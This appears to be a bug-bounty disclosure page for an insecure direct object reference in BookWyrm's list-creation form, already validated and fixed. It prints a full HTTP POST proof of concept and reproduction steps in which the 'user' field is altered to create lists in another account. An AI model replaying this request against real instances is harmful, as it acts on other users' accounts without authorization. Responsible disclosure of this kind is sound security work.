Insecure Direct Object References when creating a list in bookwyrm-social/bookwyrm

Valid

Reported on

Jul 18th 2022


Description

Insecure direct object references when creating a list allows one user to create a new list on behalf of another.

Proof of Concept

POST /list HTTP/2
Host: bookwyrm.social
Cookie: django_language=None; csrftoken=I5lj4znBJ9B5HnT3FAsII67G1EISidIKGlsIz5ElN9kmlDwucM2hGKx0Fy4gM8vj; sessionid=kskbj9mmxksyiaqyup8tsri8zrh6x0xi
Content-Length: 158
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://bookwyrm.social
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://bookwyrm.social/user/<user1>/lists
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

csrfmiddlewaretoken=z1U84ZsGwubuTiOAGXssNXkAfZ7KbII6xh1xzvJqAuULxyr1d921LBKUTTt8FDvF&user=<user2_id>&name=testname&description=testdes&curation=closed&privacy=public

Steps to reproduce

1.Login with user1 account then go to Profile page.
2.Go to the Lists tab then create a new list.
3.Intercept the request, in the body content, change the value of user from user1_id to user2_id then forward the request.
4.You will see that a new list is create in user2 account instead of user1 account.

Impact

This vulnerability is capable of allows a user to create a list on other users' accounts, affecting the logic of the application.

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
We have contacted a member of the bookwyrm-social/bookwyrm team and are waiting to hear back a year ago
We have sent a follow up to the bookwyrm-social/bookwyrm team. We will try again in 7 days. a year ago
Mouse Reeve validated this vulnerability a year ago
KhanhCM has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve marked this as fixed in 0.4.5 with commit 41b20c a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
form.html#L1-L116 has been validated
list.py#L23-L176 has been validated
create_form.html#L1-L12 has been validated
KhanhCM
a year ago

Researcher


Hi @maintainer,

Can you please review my other reports? Here are the links for them:
https://huntr.dev/bounties/8e6881f7-40c0-4bfe-a2bd-2f10b6ed9a90/.
https://huntr.dev/bounties/817d1e61-8611-4c4d-9c14-834352f427cb/.

Many thanks!

KhanhCM
a year ago

Researcher


Hi @maintainer,

Can you please review my other reports? Here are the links for them:

https://huntr.dev/bounties/8e6881f7-40c0-4bfe-a2bd-2f10b6ed9a90/.

https://huntr.dev/bounties/817d1e61-8611-4c4d-9c14-834352f427cb/.

Many thanks!

to join this conversation